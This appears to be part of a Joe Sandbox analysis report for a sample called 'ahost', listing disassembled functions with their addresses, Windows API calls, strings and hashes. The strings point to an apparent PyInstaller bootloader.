API String ID: 2050909247-3659356012
Opcode ID: c22786fa0e0d9b249edca934909f20669ce2563e5725f3d93f71470edfc8a38e
Instruction ID: e9e12ab08463cda390116e236c683fadd9e20ed62b8bef6d5921ca872d575994
Opcode Fuzzy Hash: c22786fa0e0d9b249edca934909f20669ce2563e5725f3d93f71470edfc8a38e
Instruction Fuzzy Hash: 3C414021E0864686FB20FF21A8415B9A3A0AF45794FC44532EE6E477DDDE3CF5418BA1

Function 00007FF7F91E1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1.3.1, xrefs: 00007FF7F91E1249
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF7F91E12BA
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF7F91E1276
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF7F91E12EF
malloc, xrefs: 00007FF7F91E12C1, 00007FF7F91E12F6
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF7F91E141E

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 3e3032e9574b13eb4f533a8bf58f2fd30dc85792962ca480065207ba416343bd
Instruction ID: 8eb643ec19bcdea21e095f0314af4773546b0d5ad10ebdf1178a366905125921
Opcode Fuzzy Hash: 3e3032e9574b13eb4f533a8bf58f2fd30dc85792962ca480065207ba416343bd
Instruction Fuzzy Hash: EE519122E0864282FB61BF15B8103BAA2A1AB85794FC44135EE6E477D9EF3CE5418791

Function 00007FF7F91E36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF7F91E3804), ref: 00007FF7F91E36E1
GetLastError.KERNEL32(?,00007FF7F91E3804), ref: 00007FF7F91E36EB

Part of subcall function 00007FF7F91E2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2C9E
Part of subcall function 00007FF7F91E2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2D63
Part of subcall function 00007FF7F91E2C50: MessageBoxW.USER32 ref: 00007FF7F91E2D99

Strings

GetModuleFileNameW, xrefs: 00007FF7F91E36FA
\\?\, xrefs: 00007FF7F91E375A
Failed to resolve full path to executable %ls., xrefs: 00007FF7F91E3739
Failed to obtain executable path., xrefs: 00007FF7F91E36F3
Failed to convert executable path to UTF-8., xrefs: 00007FF7F91E3790

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: 5a8add56418033b7c39bdd4b8d641fa12143a0809633e240a8bfd8e2d45399db
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: FA214FA1F1864242FB61BF24FC113BAA2B0BF44354FC04131D67D825EDEE2CE50583A5

Function 00007FF7F91FBACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91FBEF9

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
Instruction ID: 9884b20202ac9e5118205879b2a86619ab924cd8e6f72585e4f3ceca5fcae30c
Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
Instruction Fuzzy Hash: 35C1D522E4868A41F770AF15A8402BDA771EB81B88FD54131EB7E037D9EF7CE45583A0

Function 00007FF7F91E6350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF7F91E63F7
Failed to load Python DLL '%ls'., xrefs: 00007FF7F91E6497
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF7F91E63B7
LoadLibrary, xrefs: 00007FF7F91E649E
ucrtbase.dll, xrefs: 00007FF7F91E63CD
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF7F91E6446

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
Instruction ID: 402d2aa6ff56c8e95c932c549241a57d5b5cb113419b88899dc7a8fd74ebe2e2
Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
Instruction Fuzzy Hash: E0413961E0868692EB15FF24F8142E9A371BB54380FC00132EA6D436D9EE3CF615C3A1

Function 00007FF7F91F5698 Relevance: 6.1, APIs: 4, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F56C5
CreateFileW.KERNEL32 ref: 00007FF7F91F5704
CloseHandle.KERNEL32 ref: 00007FF7F91F5739

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction ID: 5b99d0963e6d5cbf6175fddd5112a3b6e5f3c26b27ac0fc5bf3803346ebff192
Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction Fuzzy Hash: 3941A622D1878583F750AF20A914379A670FB94758F908335E77C03AD9EF7CA5E087A0

Function 00007FF7F91ECCAC Relevance: 4.6, APIs: 3, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F91ECE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7F91ECE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7F91ECCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF7F91ECD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF7F91ECD91

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: 559177495319094697045fd01ce889ceb8905b357269d72fbb773dcead9883eb
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: 79312B24E0814646FB64BF24BC213B9A6B1AF41384FC44434EA3E472DFDE2DB50582F2

Function 00007FF7F91F01AC Relevance: 3.2, APIs: 2, Instructions: 177
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F01F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F02E7

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: c96c9b31988018986e1f3885fe58d5b314b84a6d3d30878889b1be9de6293051
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: 9051D861F0964946FB64AE25AC0067AE6A1AF44BACF944734DF7D437CDEF3CD4018AA0

Function 00007FF7F91FC1A4 Relevance: 3.0, APIs: 2, Instructions: 46
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF7F91FC33D), ref: 00007FF7F91FC1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF7F91FC33D), ref: 00007FF7F91FC1FA

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: 8e14470d234dd54ed00dc2bd32ee21cadaa43b285cb6f706435381aa38cd5bae
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: 6F11E261A18A4581EB20AF25BC14169A371AB41BF8FA40331EE7E4B7ECDF3CD0118780

Function 00007FF7F91FABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF7F91FAA45,?,?,00000000,00007FF7F91FAAFA), ref: 00007FF7F91FAC36
GetLastError.KERNEL32(?,?,?,00007FF7F91FAA45,?,?,00000000,00007FF7F91FAAFA), ref: 00007FF7F91FAC40

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 2a21e30385b3368fc9d2ce6c3d3da71baf87aa466c829b30c2c42fa73aca0d4c
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: 8521B321F1C64641FBD4AF21BC9027992A65F847A8F984334DB3E473D9FE6CA4404390

Function 00007FF7F91FBF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91FBF44

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: f54cd4fd4dadf9e2d986613561f72392da95f41ba0df84fe0a753b136376ff2b
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: 4141A232D0820987FB74AF15F940279B3B4EB55B48F940131D7BD866D9EB2DE4028AA1

Function 00007FF7F91E7F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF7F91E802A

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 7956da3bc7ebdf0e6751cfee80c3b3a7eb40ca053181cf40dfbd3eb0de021786
Instruction ID: 03bbbc4c37ab351b520f6a4c5d1163f782ac27e06166d5ca2fd98c891b0e493a
Opcode Fuzzy Hash: 7956da3bc7ebdf0e6751cfee80c3b3a7eb40ca053181cf40dfbd3eb0de021786
Instruction Fuzzy Hash: F221BB21F1865286FB58BE2279043BAD661BF45BD8FCC0070EE6C077CADE3DE44186A1

Function 00007FF7F91FB9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91FBA32

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction ID: ba4f1c134a783ccdc4b500deed89fb48745e438841059c75e2539ea0e805a081
Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction Fuzzy Hash: AE317C31E2864A85F761BF55AC4127CAA70AB80B98FC10135EB3D473DAEF7CA45187B0

Function 00007FF7F91F6004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F5F69

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 180e1abbd3a409681df0892ecc8f6042999b75a6e9021efee80724af34e77979
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 60114F22E1864942FB60BF11B80017DE674AF85B88F8540B1EB7D57ADAEF3ED40087A0

Function 00007FF7F92063C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F92063E7

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: 676c7c1d506c1664077f5287841121bc6a905ceb5ea9742d912aa7df9a95cef2
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: B2219572E1864586EBA1AF18E840379B6B0FB84B54F944334E6AD876EDDF3CD4048B50

Function 00007FF7F91F042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F0480

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: c7da64207e5e993d3a647450791a941979b7ebdfa649c29cd98b28bcb0fc40bc
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 9D018E22E0874941EB05EF52AD01079E6A1BF85FE8B884631EF7C57BDAEE3CE1018750

Function 00007FF7F91E9070 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F91E9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F91E45E4,00000000,00007FF7F91E1985), ref: 00007FF7F91E9439

LoadLibraryExW.KERNEL32(?,00007FF7F91E6466,?,00007FF7F91E336E), ref: 00007FF7F91E9092

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
Instruction ID: 375ac81c0a1afec4dda26be2ed366408b50001e8b0028120e8fd544585be1f05
Opcode Fuzzy Hash: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
Instruction Fuzzy Hash: 7CD08611F2414542FB54BB677A4652991625BC9BC4F888035EE2D03799DC3CD0514700

Function 00007FF7F91FD66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF7F91F0D00,?,?,?,00007FF7F91F236A,?,?,?,?,?,00007FF7F91F3B59), ref: 00007FF7F91FD6AA

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: 4ca5cd52a44ddc0ed6aa6d754ea44280300fe51a4618d9d5b00d4a7fd9cba1d9
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
